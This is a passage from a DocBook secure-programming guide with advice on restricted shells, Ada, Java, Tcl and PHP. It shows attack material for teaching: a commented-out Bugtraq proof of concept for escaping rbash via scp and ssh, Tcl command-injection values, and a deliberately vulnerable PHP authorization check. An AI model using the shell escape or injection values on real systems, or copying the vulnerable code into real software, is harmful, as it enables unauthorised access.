GNU programs xargs and cpio allow using either --null or -0,
|
||
tar uses --null,
|
||
find uses -print0,
|
||
grep uses either --null or -Z, and
|
||
sort uses either -z or --zero-terminated.
|
||
Those who find this inconsistency particularly disturbing are invited
|
||
to supply patches to the GNU authors;
|
||
I would suggest making sure every program supported ``--null'' since that
|
||
seems to be the most common option name.
|
||
For example, here's one way to move files to a target directory, even
|
||
if there may be a vast number of files and some may have awkward names
|
||
with embedded newlines
|
||
(thanks to Jim Dennis for reminding me of this):
|
||
<programlisting>
|
||
find . -print0 | xargs --null mv --target-dir=$TARG
|
||
</programlisting>
|
||
<!--
|
||
Noted briefly in:
|
||
http://www.linuxjournal.com//article.php?sid=6060
|
||
-->
|
||
</para>
|
||
|
||
<para>
|
||
In a similar vein, I recommend <emphasis>not</emphasis> trusting
|
||
``restricted shells'' to implement secure policies.
|
||
Restricted shells are shells that intentionally prevent users from
|
||
performing a large set of activities - their goal is to force users
|
||
to only run a small set of programs.
|
||
A restricted shell can be useful as a defense-in-depth measure, but
|
||
restricted shells are notoriously hard to configure correctly and as
|
||
configured are often subvertable.
|
||
For example, some restricted shells will start by running some file
|
||
in an unrestricted mode (e.g., ``.profile'') - if a user can change this
|
||
file, they can force execution of that code.
|
||
A restricted shell should be set up to only run a few programs, but
|
||
if any of those programs have ``shell escapes'' to let users run more
|
||
programs, attackers can use those shell escapes to escape the
|
||
restricted shell.
|
||
Even if the programs don't have shell escapes, it's quite likely that
|
||
the various programs can be used together (along with the shell's capabilities)
|
||
to escape the restrictions.
|
||
Of course, if you don't set the PATH of a restricted shell (and allow
|
||
any program to run), then an attacker can use the shell escapes of
|
||
many programs (including text editors, mailers, etc.).
|
||
The problem is that the purpose of a shell is to run other programs,
|
||
but those other programs may allow unintended operations -- and the
|
||
shell doesn't interpose itself to prevent these operations.
|
||
</para>
|
||
|
||
<!--
|
||
|
||
(From Bugtraq)
|
||
|
||
Subject: Restricted Shells
|
||
From: A.Dimitrov <adimitro@bobcat.gcsu.edu>
|
||
Date: 18 Apr 2002 21:12:23 -0000
|
||
To: bugtraq@securityfocus.com
|
||
|
||
I have recently realized a security issue in some
|
||
of the restricted shells on *NIX systems. I am not
|
||
sure if I am the first one to discover the problem
|
||
I am going to discuss but I am sure that it has
|
||
not been posted yet, atleast not that I know of.
|
||
|
||
Basically this is the issue:
|
||
|
||
Affected Systems:
|
||
=================
|
||
Any Unix systems that I am aware of using
|
||
restricted shells (rbash, rksh)
|
||
|
||
Description:
|
||
============
|
||
An authorized user is that is set to use rbash or
|
||
rksh is able to escape the restricted shell
|
||
environment and then furthermore exploit the
|
||
system. The problem comes from the fact thatwhen a
|
||
command is executed from the shell and it is found
|
||
to be a shell procedure then rksh or rbash are
|
||
invoked to execute it.
|
||
|
||
Proof:
|
||
======
|
||
|
||
One needs to store the shell script in a
|
||
world-writable directory like /tmp or /usr/tmp
|
||
so let's assume the server is running sshd (This
|
||
is also exploitable through rsh). In this case
|
||
store in a file called anything you want (I will
|
||
use .tmp123) the following:
|
||
|
||
===
|
||
|
||
/usr/bin/bash
|
||
rm -Rf /tmp/.tmp123
|
||
|
||
===
|
||
|
||
|
||
Then execute the following:
|
||
|
||
$scp ./.tmp123 user@host:/tmp user@host's password:
|
||
|
||
Done.
|
||
|
||
$ssh -l user host '/tmp/.tmp123'
|
||
user@host's password:
|
||
_
|
||
|
||
|
||
You should now have a normal bash shell instead
|
||
of the original rbash.
|
||
Also a great plus to doing this is that whenever
|
||
you follow the procedure above the commands 'w'
|
||
and 'who' cannot detect your presence. However
|
||
'ps' dows show the intruder's presence.
|
||
|
||
Fix:
|
||
====
|
||
I am not aware of any except maybe an attempt to
|
||
retune the system. If anyone has any ideas please
|
||
e-mail me.
|
||
|
||
A. Dimitrov
|
||
System Administrator
|
||
Georgia College & State University
|
||
|
||
|
||
A reply in 18 April 2002 Bugtraq said:
|
||
Subject: Re: Restricted Shells
|
||
From: "Scott T. Cameron" <karn@routehero.com>
|
||
Date: Thu, 18 Apr 2002 17:58:13 -0700
|
||
To: bugtraq@securityfocus.org
|
||
|
||
[snip]
|
||
|
||
With sshd2, you should be able use 'ChrootGroups' or 'ChrootUsers' to fix this problem. Please see sshd2_config(5).
|
||
|
||
|
||
|
||
(but of course, this still shows that restricted shells are hard to
|
||
use correctly).
|
||
|
||
-->
|
||
</sect1>
|
||
|
||
<sect1 id="ada">
|
||
<title>Ada</title>
|
||
<para>
|
||
In Ada95, the Unbounded_String type is often more flexible than the
|
||
String type because it is automatically resized as necessary.
|
||
However, don't store especially sensitive secret values such as passwords
|
||
or secret keys in an Unbounded_String, since core dumps and page areas
|
||
might still hold them later.
|
||
Instead, use the String type for this data, lock it into memory
|
||
while it's used, and overwrite the data as
|
||
soon as possible with some constant value such as (others => ' ').
|
||
Use the Ada pragma Inspection_Point on the object holding the secret
|
||
after erasing the memory.
|
||
That way, you can be certain that
|
||
the object containing the secret will really be erased
|
||
(and that the overwriting won't be optimized away).
|
||
</para>
|
||
|
||
<para>
|
||
It's common for beginning Ada programmers to believe that the
|
||
String type's first index value is always 1, but this isn't true if
|
||
the string is sliced.
|
||
Avoid this error.
|
||
</para>
|
||
|
||
<para>
|
||
It's worth noting that SPARK is
|
||
a ``high-integrity subset of the Ada programming language'';
|
||
SPARK users use a tool called the ``SPARK Examiner'' to check
|
||
conformance to SPARK rules, including flow analysis, and there are
|
||
various supports for full formal proof of the code if desired.
|
||
<ulink url="http://www.sparkada.com">See the SPARK website for more
|
||
information</ulink>.
|
||
To my knowledge, there are no OSS/FS SPARK tools.
|
||
If you're storing passwords and private keys you should still
|
||
lock them into memory if appropriate
|
||
and overwrite them as soon as possible.
|
||
Note that SPARK is often used in environments where paging does not occur.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="java">
|
||
<title>Java</title>
|
||
|
||
<para>
|
||
<!-- Could mention "Core Java 2"; see http://www.amazon.com/
|
||
exec/obidos/ASIN/0130819336/ref=sim_books/102-4729136-4374443 -->
|
||
<!-- ???: Add more information about creating your own domains inside
|
||
a Java program.-->
|
||
If you're developing secure programs using Java,
|
||
frankly your first step (after learning Java)
|
||
is to read the two primary texts for Java security, namely
|
||
Gong [1999]
|
||
and
|
||
McGraw [1999] (for the latter, look particularly at section 7.1).
|
||
You should also look at Sun's posted security code guidelines at
|
||
<ulink url="http://java.sun.com/security/seccodeguide.html">http://java.sun.com/security/seccodeguide.html</ulink>, and
|
||
there's a nice
|
||
<ulink url="http://www-106.ibm.com/developerworks/java/library/j-staticsec.html?loc=dwmain">
|
||
article by Sahu et al [2002]</ulink>
|
||
A set of slides describing Java's security model are freely available at
|
||
<ulink url="http://www.dwheeler.com/javasec">http://www.dwheeler.com/javasec</ulink>.
|
||
You can also see McGraw [1998].
|
||
</para>
|
||
|
||
<para>
|
||
Obviously, a great deal depends on the kind of application you're developing.
|
||
Java code intended for use on the client side has a completely different
|
||
environment (and trust model) than code on a server side.
|
||
The general principles apply, of course; for example, you must
|
||
check and filter any input from an untrusted source.
|
||
However, in Java there are some ``hidden'' inputs or potential inputs that you
|
||
need to be wary of, as discussed below.
|
||
Johnathan Nightingale [2000] made an interesting statement
|
||
summarizing many of the issues in Java programming:
|
||
<blockquote>
|
||
<para>
|
||
... the big thing with Java programming is minding your inheritances.
|
||
If you inherit methods from parents, interfaces, or
|
||
parents' interfaces, you risk opening doors to your code.
|
||
</para>
|
||
</blockquote>
|
||
<!-- Secprog, Wed, 1 Nov 2000 18:46:43 -0500, Re: Secure Java programming -->
|
||
</para>
|
||
|
||
<para>
|
||
The following are a few key guidelines, based on Gong [1999],
|
||
McGraw [1999], Sun's guidance, and my own experience:
|
||
|
||
<orderedlist>
|
||
|
||
<listitem><para>
|
||
Do not use public fields or variables; declare them as private and
|
||
provide accessors to them so you can limit their accessibility.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Make methods private unless there is a good reason to do otherwise
|
||
(and if you do otherwise, document why).
|
||
These non-private methods must protect themselves, because they may
|
||
receive tainted data (unless you've somehow arranged to protect them).
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
The JVM may not actually enforce the accessibility modifiers
|
||
(e.g., ``private'') at run-time in an application
|
||
(as opposed to an applet).
|
||
My thanks to John Steven (Cigital Inc.), who pointed this out
|
||
on the ``Secure Programming'' mailing list on November 7, 2000.
|
||
The issue is that it all depends on what class loader
|
||
the class requesting the access was loaded with.
|
||
If the class was loaded with a trusted class loader (including the null/
|
||
primordial class loader),
|
||
the access check returns "TRUE" (allowing access).
|
||
For example, this works
|
||
(at least with Sun's 1.2.2 VM ; it might not work with
|
||
other implementations):
|
||
<orderedlist>
|
||
<listitem><para>write a victim class (V) with a public field, compile it.</para></listitem>
|
||
<listitem><para>write an 'attack' class (A) that accesses that field, compile it </para></listitem>
|
||
<listitem><para>change V's public field to private, recompile</para></listitem>
|
||
<listitem><para>run A - it'll access V's (now private) field.</para></listitem>
|
||
</orderedlist>
|
||
</para>
|
||
<para>
|
||
However, the situation is different with applets.
|
||
If you convert A to an applet and run it as an applet
|
||
(e.g., with appletviewer or browser), its class loader is no
|
||
longer a trusted (or null) class loader.
|
||
Thus, the code will throw
|
||
java.lang.IllegalAccessError, with the message that
|
||
you're trying to access a field V.secret from class A.
|
||
</para></listitem>
|
||
<!-- Source: SECPROG
|
||
Date: Tue, 7 Nov 2000 16:52:47 -0500
|
||
From: John Steven jsteven@CIGITAL.COM
|
||
Subject: Re: Java and 'private'
|
||
|
||
I looked into this w/ the Java 1.1 VM Spec., and the 1.2.2 VM source,
|
||
'spent only a short amount of time on it-mileage may vary.
|
||
-->
|
||
|
||
<listitem><para>
|
||
Avoid using static field variables. Such variables are attached to the
|
||
class (not class instances), and classes can be located by any other class.
|
||
As a result, static field variables can be found by any other class, making
|
||
them much more difficult to secure.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Never return a mutable object to potentially malicious code
|
||
(since the code may decide to change it).
|
||
Note that arrays are mutable (even if the array contents aren't),
|
||
so don't return a reference to an internal array with sensitive data.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Never store user given mutable objects (including arrays of objects)
|
||
directly.
|
||
Otherwise, the user could hand the object to the secure code, let the
|
||
secure code ``check'' the object, and change the data while the secure code
|
||
was trying to use the data.
|
||
Clone arrays before saving them internally, and be careful here
|
||
(e.g., beware of user-written cloning routines).
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Don't depend on initialization.
|
||
There are several ways to allocate uninitialized objects.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Make everything final, unless there's a good reason not to.
|
||
If a class or method is non-final, an attacker could try to extend it
|
||
in a dangerous and unforeseen way.
|
||
Note that this causes a loss of extensibility, in exchange for security.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Don't depend on package scope for security.
|
||
A few classes, such as java.lang, are closed by default, and some
|
||
Java Virtual Machines (JVMs) let you close off other packages.
|
||
Otherwise, Java classes are not closed.
|
||
Thus, an attacker could introduce a new class inside your package,
|
||
and use this new class to access the things you thought you were protecting.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Don't use inner classes.
|
||
When inner classes are translated into byte codes, the inner class
|
||
is translated into a class accesible to any class in the package.
|
||
Even worse, the enclosing class's private fields silently
|
||
become non-private to permit access by the inner class!
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Minimize privileges.
|
||
Where possible, don't require any special permissions at all.
|
||
McGraw goes further and recommends not signing any code; I say
|
||
go ahead and sign the code (so users can decide to ``run only
|
||
signed code by this list of senders''), but try to write the program
|
||
so that it needs nothing more than the sandbox set of privileges.
|
||
If you must have more privileges, audit that code especially hard.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
If you must sign your code, put it all in one archive file.
|
||
Here it's best to quote McGraw [1999]:
|
||
<blockquote>
|
||
<para>
|
||
The goal of this rule is to prevent
|
||
an attacker from carrying out a mix-and-match
|
||
attack in which the attacker constructs a new applet
|
||
or library that links some of your signed classes together
|
||
with malicious classes, or links together signed classes that you
|
||
never meant to be used together.
|
||
By signing a group of classes together, you make this attack more difficult.
|
||
Existing code-signing systems do an inadequate job of
|
||
preventing mix-and-match attacks, so this rule cannot
|
||
prevent such attacks completely. But using a single archive can't hurt.
|
||
</para>
|
||
</blockquote>
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Make your classes uncloneable.
|
||
Java's object-cloning mechanism allows an attacker to
|
||
instantiate a class without running any of its constructors.
|
||
To make your class uncloneable, just define the following method
|
||
in each of your classes:
|
||
<!-- Originally this said void, not Object; I'm told Object is correct. -->
|
||
<programlisting width="71">
|
||
<![CDATA[
|
||
public final Object clone() throws java.lang.CloneNotSupportedException {
|
||
throw new java.lang.CloneNotSupportedException();
|
||
}
|
||
]]>
|
||
</programlisting>
|
||
</para>
|
||
<para>
|
||
If you really need to make your class cloneable, then there are some
|
||
protective measures you can take to prevent attackers from redefining
|
||
your clone method.
|
||
If you're defining your own clone method, just make it final.
|
||
If you're not, you can at least prevent the clone method from
|
||
being maliciously overridden by adding the following:
|
||
<programlisting width="71">
|
||
<![CDATA[
|
||
public final void clone() throws java.lang.CloneNotSupportedException {
|
||
super.clone();
|
||
}
|
||
]]>
|
||
</programlisting>
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Make your classes unserializeable.
|
||
Serialization allows attackers to view the internal state of your objects,
|
||
even private portions.
|
||
To prevent this, add this method to your classes:
|
||
<programlisting width="66">
|
||
<![CDATA[
|
||
private final void writeObject(ObjectOutputStream out)
|
||
throws java.io.IOException {
|
||
throw new java.io.IOException("Object cannot be serialized");
|
||
}
|
||
]]>
|
||
</programlisting>
|
||
</para>
|
||
<para>
|
||
Even in cases where serialization is okay, be sure to use
|
||
the transient keyword for the fields
|
||
that contain direct handles to system resources and
|
||
that contain information relative to an address space.
|
||
Otherwise, deserializing the class may permit improper access.
|
||
You may also want to identify sensitive information as transient.
|
||
</para>
|
||
|
||
<para>
|
||
If you define your own serializing method for a class,
|
||
it should not pass an internal array to any DataInput/DataOuput
|
||
method that takes an array.
|
||
The rationale: All DataInput/DataOutput methods can be overridden.
|
||
If a Serializable class passes a private array directly to a DataOutput(write(byte [] b)) method, then an attacker
|
||
could subclass ObjectOutputStream and override the write(byte [] b)
|
||
method to enable him to access and modify the private array.
|
||
Note that the default serialization does not expose private
|
||
byte array fields to DataInput/DataOutput byte array methods.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Make your classes undeserializeable.
|
||
Even if your class is not serializeable, it may still be deserializeable.
|
||
An attacker can create a sequence of bytes that happens
|
||
to deserialize to an instance of your class with values of the
|
||
attacker's choosing.
|
||
In other words, deserialization is a kind of public constructor, allowing
|
||
an attacker to choose the object's state - clearly a dangerous operation!
|
||
To prevent this, add this method to your classes:
|
||
<programlisting width="66">
|
||
<![CDATA[
|
||
private final void readObject(ObjectInputStream in)
|
||
throws java.io.IOException {
|
||
throw new java.io.IOException("Class cannot be deserialized");
|
||
}
|
||
]]>
|
||
</programlisting>
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Don't compare classes by name.
|
||
After all, attackers can define classes with identical names, and if
|
||
you're not careful you can cause confusion by granting these classes
|
||
undesirable privileges.
|
||
Thus, here's an example of the <emphasis>wrong</emphasis> way
|
||
to determine if an object has a given class:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
if (obj.getClass().getName().equals("Foo")) {
|
||
]]>
|
||
</programlisting>
|
||
</para>
|
||
<para>
|
||
If you need to determine if two objects have exactly the
|
||
same class, instead
|
||
use getClass() on both sides and compare using the == operator,
|
||
Thus, you should use this form:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
if (a.getClass() == b.getClass()) {
|
||
]]>
|
||
</programlisting>
|
||
If you truly need to determine if an object has a given classname, you
|
||
need to be pedantic and be sure to use the current namespace
|
||
(of the current class's ClassLoader).
|
||
Thus, you'll need to use this format:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
if (obj.getClass() == this.getClassLoader().loadClass("Foo")) {
|
||
]]>
|
||
</programlisting>
|
||
</para>
|
||
<para>
|
||
This guideline is from McGraw and Felten, and it's a good guideline.
|
||
I'll add that, where possible, it's often a good idea to avoid comparing
|
||
class values anyway.
|
||
It's often better to try to design class methods and interfaces so you
|
||
don't need to do this at all.
|
||
However, this isn't always practical, so it's important to know these tricks.
|
||
</para></listitem>
|
||
|
||
<listitem><para>
|
||
Don't store secrets (cryptographic keys, passwords, or
|
||
algorithm) in the code or data.
|
||
Hostile JVMs can quickly view this data.
|
||
Code obfuscation doesn't really hide the code from serious attackers.
|
||
</para></listitem>
|
||
|
||
</orderedlist>
|
||
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="tcl">
|
||
<title>Tcl</title>
|
||
<para>
|
||
Tcl stands for ``tool command language'' and is pronounced ``tickle.''
|
||
Tcl is divided into two parts: a language and a library.
|
||
The language is a simple language, originally intended for issuing commands
|
||
to interactive programs and including basic programming capabilities.
|
||
The library can be embedded in application programs.
|
||
You can find more information about Tcl at sites such as the
|
||
<ulink url="http://www.tcl.tk/">Tcl.tk</ulink> and the
|
||
<ulink url="http://www.sco.com/Technology/tcl/Tcl.html">Tcl WWW Info</ulink>
|
||
web page and the comp.lang.tcl FAQ launch page at
|
||
<ulink url="http://www.tclfaq.wservice.com/tcl-faq">http://www.tclfaq.wservice.com/tcl-faq</ulink>.
|
||
My thanks go to Wojciech Kocjan for providing some of this detailed
|
||
information on using Tcl in secure applications.
|
||
</para>
|
||
|
||
<para>
|
||
For some security applications, especially interesting components of Tcl
|
||
are Safe-Tcl (which creates a sandbox in Tcl)
|
||
and Safe-TK (which implements a sandboxed portable GUI for Safe Tcl), as
|
||
well as the WebWiseTclTk Toolkit which permits Tcl packages to be automatically
|
||
located and loaded from anywhere on the World Wide Web.
|
||
You can find more about the latter from
|
||
<ulink url="http://www.cbl.ncsu.edu/software/WebWiseTclTk">http://www.cbl.ncsu.edu/software/WebWiseTclTk</ulink>.
|
||
It's not clear to me how much code review this has received.
|
||
</para>
|
||
|
||
<para>
|
||
Tcl's original design goal to be a small, simple
|
||
language resulted in a language that was originally somewhat limiting
|
||
and slow.
|
||
For an example of the limiting weaknesses in the original language, see
|
||
<ulink url="http://sdg.lcs.mit.edu/~jchapin/6853-FT97/Papers/stallman-tcl.html">
|
||
Richard Stallman's ``Why You Should Not Use Tcl''</ulink>.
|
||
For example, Tcl was originally designed to really support only
|
||
one data type (string).
|
||
Thankfully, these issues have been addressed over time.
|
||
In particular, version 8.0 added support for more data types
|
||
(integers are stored internally as integers, lists as lists and so on).
|
||
This improves its capabilities, and in particular improves its speed.
|
||
</para>
|
||
|
||
<para>
|
||
As with essentially all scripting languages,
|
||
Tcl has an "eval" command that parses and executes arbitrary Tcl commands.
|
||
And like all such scripting languages, this eval command needs to be
|
||
used especially carefully, or an attacker could insert
|
||
characters in the input to cause malicious things to occur.
|
||
For example, an attackers may be able insert characters
|
||
with special meaning to Tcl
|
||
such as embedded whitespace (including space and newline),
|
||
double-quote, curly braces, square brackets,
|
||
dollar signs, backslash, semicolon, or pound sign (or create input
|
||
to cause these characters to be created during processing).
|
||
This also applies to any function that passes data to eval as well
|
||
(depending on how eval is called).
|
||
</para>
|
||
|
||
<para>
|
||
Here is a small example that may make this concept clearer;
|
||
first, let's define a small function and then interactively invoke it
|
||
directly - note that these uses are fine:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
proc something {a b c d e} {
|
||
puts "A='$a'"
|
||
puts "B='$b'"
|
||
puts "C='$c'"
|
||
puts "D='$d'"
|
||
puts "E='$e'"
|
||
}
|
||
|
||
% # This works normally:
|
||
% something "test 1" "test2" "t3" "t4" "t5"
|
||
A='test 1'
|
||
B='test2'
|
||
C='t3'
|
||
D='t4'
|
||
E='t5'
|
||
|
||
% # Imagine that str1 is set by an attacker:
|
||
% set str1 {test 1 [puts HELLOWORLD]}
|
||
|
||
% # This works as well
|
||
% something $str1 t2 t3 t4 t5
|
||
A='test 1 [puts HELLOWORLD]'
|
||
B='t2'
|
||
C='t3'
|
||
D='t4'
|
||
E='t5'
|
||
]]>
|
||
</programlisting>
|
||
|
||
However, continuing the example, let's see how "eval"
|
||
can be incorrectly and correctly called.
|
||
If you call eval in an incorrect (dangerous) way, it
|
||
allows attackers to misuse it.
|
||
However, by using commands like list or lrange to correctly
|
||
group the input, you can avoid this problem:
|
||
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
% # This is the WRONG way - str1 is interpreted.
|
||
% eval something $str1 t2 t3
|
||
HELLOWORLD
|
||
A='test'
|
||
B='1'
|
||
C=''
|
||
D='t2'
|
||
E='t3'
|
||
|
||
% # Here's one solution, using "list".
|
||
% eval something [list $str1 t2 t3 t4 t5]
|
||
A='test 1 [puts HELLOWORLD]'
|
||
B='t2'
|
||
C='t3'
|
||
D='t4'
|
||
E='t5'
|
||
|
||
% # Here's another solution, using lrange:
|
||
% eval something [lrange $str1 0 end] t2
|
||
A='test'
|
||
B='1'
|
||
C='[puts'
|
||
D='HELLOWORLD]'
|
||
E='t2'
|
||
]]>
|
||
</programlisting>
|
||
Using lrange is useful when concatenating arguments to a called
|
||
function, e.g., with more complex libraries using callbacks.
|
||
In Tcl, eval is often used to create a one-argument version of a function
|
||
that takes a variable number of arguments, and you need to be careful
|
||
when using it this way.
|
||
Here's another example (presuming that you've defined a "printf" function):
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
proc vprintf {str arglist} {
|
||
eval printf [list $str] [lrange $arglist 0 end]
|
||
}
|
||
|
||
% printf "1+1=%d 2+2=%d" 2 4
|
||
% vprintf "1+1=%d 2+2=%d" {2 4}
|
||
]]>
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
Fundamentally, when passing a command that will be eventually
|
||
evaluated, you must pass Tcl commands as a properly built list,
|
||
and not as a (possibly concatentated) string.
|
||
For example, the "after" command runs a Tcl command after a given
|
||
number of milliseconds; if the data in $param1 can be controlled by
|
||
an attacker, this Tcl code is dangerously wrong:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
# DON'T DO THIS if param1 can be controlled by an attacker
|
||
after 1000 "someCommand someparam $param1"
|
||
]]>
|
||
</programlisting>
|
||
This is wrong, because if an attacker can control the value of $param1,
|
||
the attacker can control the program.
|
||
For example, if the attacker can cause $param1 to have
|
||
'[exit]', then the program will exit.
|
||
Also, if $param1 would be '; exit', it would also exit.
|
||
</para>
|
||
|
||
<para>
|
||
Thus, the proper alternative would be:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
after 1000 [list someCommand someparam $param1]
|
||
]]>
|
||
</programlisting>
|
||
Even better would be something like the following:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
set cmd [list someCommand someparam]
|
||
after 1000 [concat $cmd $param1]
|
||
]]>
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
Here's another example showing what you shouldn't do,
|
||
pretending that $params is data controlled by possibly malicious user:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
set params "%-20s TESTSTRING"
|
||
puts "'[eval format $params]'"
|
||
]]>
|
||
</programlisting>
|
||
will result in:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
'TESTSTRING '
|
||
]]>
|
||
</programlisting>
|
||
But, when if the untrusted user sends data with an embedded newline,
|
||
like this:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
set params "%-20s TESTSTRING\nputs HELLOWORLD"
|
||
puts "'[eval format $params]'"
|
||
]]>
|
||
</programlisting>
|
||
The result will be this (notice that the attacker's code was executed!):
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
HELLOWORLD
|
||
'TESTINGSTRING '
|
||
]]>
|
||
</programlisting>
|
||
Wojciech Kocjan suggests that the
|
||
simplest solution in this case is to convert this to a list using
|
||
lrange, doing this:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
set params "%-20s TESTINGSTRING\nputs HELLOWORLD"
|
||
puts "'[eval format [lrange $params 0 end]]'"
|
||
]]>
|
||
</programlisting>
|
||
The result would be:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
'TESTINGSTRING '
|
||
]]>
|
||
</programlisting>
|
||
Note that this solution presumes that the potentially malicious
|
||
text is concatenated to the end of the text; as with all languages,
|
||
make sure the attacker cannot control the format text.
|
||
</para>
|
||
|
||
<para>
|
||
As a matter of style always use curly braces
|
||
when using if, while, for, expr, and any other command which
|
||
parses an argument using expr/eval/subst.
|
||
Doing this will avoid
|
||
a common error when using Tcl called unintended double substitution
|
||
(aka double substitution).
|
||
This is best explained by example; the following code is incorrect:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
while ![eof $file] {
|
||
set line [gets $file]
|
||
}
|
||
]]>
|
||
</programlisting>
|
||
The code is incorrect because the "![eof $file]" text will be evaluated
|
||
by the Tcl parser when the while command is executed the first time,
|
||
and not re-evaluated in every iteration as it should be.
|
||
Instead, do this:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
while {![eof $file]} {
|
||
set line [gets $file]
|
||
}
|
||
]]>
|
||
</programlisting>
|
||
Note that both the condition, and the action to be performed,
|
||
are surrounded by curly braces.
|
||
Although there are cases where the braces are redundant, they never hurt,
|
||
and when you fail to include the curly braces where they're needed
|
||
(say, when making a minor change) subtle and hard-to-find
|
||
errors often result.
|
||
</para>
|
||
|
||
<para>
|
||
More information on good Tcl style can be found in documents such as
|
||
<ulink url="http://www.tcl.tk/doc/styleGuide.pdf">
|
||
Ray Johnson's Tcl Style Guide</ulink>.
|
||
</para>
|
||
|
||
<para>
|
||
In the past, I have stated that
|
||
I don't recommend Tcl for writing programs which must
|
||
mediate a security boundary.
|
||
Tcl seems to have improved since that time, so while I cannot guarantee
|
||
Tcl will work for your needs, I can't guarantee that any other language
|
||
will work for you either.
|
||
Again, my thanks to Wojciech Kocjan who provided some
|
||
of these suggestions on how to
|
||
write Tcl code for secure applications.
|
||
</para>
|
||
</sect1>
|
||
|
||
<sect1 id="PHP">
|
||
<title>PHP</title>
|
||
|
||
<para>
|
||
SecureReality has put out a very interesting paper titled
|
||
``A Study In Scarlet - Exploiting Common Vulnerabilities in PHP''
|
||
[Clowes 2001],
|
||
which discusses some of the problems in writing secure programs in PHP,
|
||
particularly in versions before PHP 4.1.0.
|
||
Clowes concludes that
|
||
``it is very hard to write a secure PHP application (in the
|
||
default configuration of PHP), even if you try''.
|
||
</para>
|
||
|
||
<para>
|
||
Granted, there are security issues in any language, but one
|
||
particular issue stands out in older versions of PHP that arguably makes
|
||
older PHP versions
|
||
less secure than most languages: the way it loads data into its namespace.
|
||
By default, in PHP (versions 4.1.0 and lower)
|
||
all environment variables and values sent to PHP over the web
|
||
are automatically loaded into the same namespace (global variables)
|
||
that normal variables are loaded into - so attackers can set arbitrary
|
||
variables to arbitrary values, which keep their values unless explicitly
|
||
reset by a PHP program.
|
||
In addition, PHP automatically creates variables with a
|
||
default value when they're first requested, so
|
||
it's common for PHP programs to not initialize variables.
|
||
If you forget to set a variable, PHP can report it, but
|
||
by default PHP won't - and note that this simply an error report, it
|
||
won't stop an attacker who finds an unusual way to cause it.
|
||
Thus, by default PHP allows an attacker to
|
||
completely control the values of all variables in a program unless
|
||
the program takes special care to override the attacker.
|
||
Once the program takes over, it can reset these variables,
|
||
but failing to reset
|
||
any variable (even one not obvious) might open a vulnerability in the
|
||
PHP program.
|
||
</para>
|
||
|
||
<para>
|
||
For example, the following PHP program (an example from Clowes)
|
||
intends to only let those who
|
||
know the password to get some important information, but an attacker
|
||
can set ``auth'' in their web browser and subvert the authorization check:
|
||
<programlisting width="65">
|
||
<![CDATA[
|
||
<?php
|
||
if ($pass == "hello")
|
||
$auth = 1;
|
||
...
|
||
if ($auth == 1)
|
||
echo "some important information";
|
||
?>
|
||
]]>
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
I and many others have complained about this particularly
|
||
dangerous problem; it's particularly a problem because
|
||
PHP is widely used.
|
||
A language that's supposed to be easy to use better make
|
||
it easy to write secure programs in, after all.
|
||
It's possible to disable this misfeature in PHP by turning the setting
|
||
``register_globals'' to ``off'', but by default PHP versions up through 4.1.0
|
||
default set this to ``on'' and PHP before 4.1.0 is harder
|
||
to use with register_globals off.
|
||
The PHP developers warned in their PHP 4.1.0 announcenment that
|
||
``as of the next semi-major version of PHP, new installations of PHP will
|
||
default to having register_globals set to off.''
|
||
This has now happened; as of PHP version 4.2.0, External
|
||
variables (from the environment, the HTTP request, cookies or the web
|
||
server) are no longer registered in the global scope by default. The
|
||
preferred method of accessing these external variables is by using the new
|
||
Superglobal arrays, introduced in PHP 4.1.0.
|
||
<!--
|
||
http://linuxtoday.com/news_story.php3?ltsn=2002-04-23-016-26-NW-DV
|
||
-->
|
||
</para>
|
||
|
||
<para>
|
||
PHP with ``register_globals'' set to ``on'' is a dangerous choice
|
||
for nontrivial programs - it's just too easy to write insecure programs.
|
||
However, once ``register_globals'' is set to ``off'', PHP is quite
|
||
a reasonable language for development.
|
||
</para>
|
||
|
||
|
||
<para>
|
||
The secure default should include setting
|
||
``register_globals'' to ``off'', and also including several functions to
|
||
make it much easier for users to specify and limit the input they'll
|
||
accept from external sources.
|
||
Then web servers (such as Apache) could separately configure this
|
||
secure PHP installation.
|
||
Routines could be placed in the PHP library to make it
|
||
easy for users to list the input variables they want to accept;
|
||
some functions could check the patterns these variables must have
|
||
and/or the type that the variable must be coerced to.
|
||
In my opinion, PHP is a bad choice for secure web development
|
||
if you set register_globals on.
|
||
</para>
|
||
|
||
<para>
|
||
As I suggested in earlier versions of this book,
|
||
PHP has been trivially modified to become a reasonable choice
|
||
for secure web development.
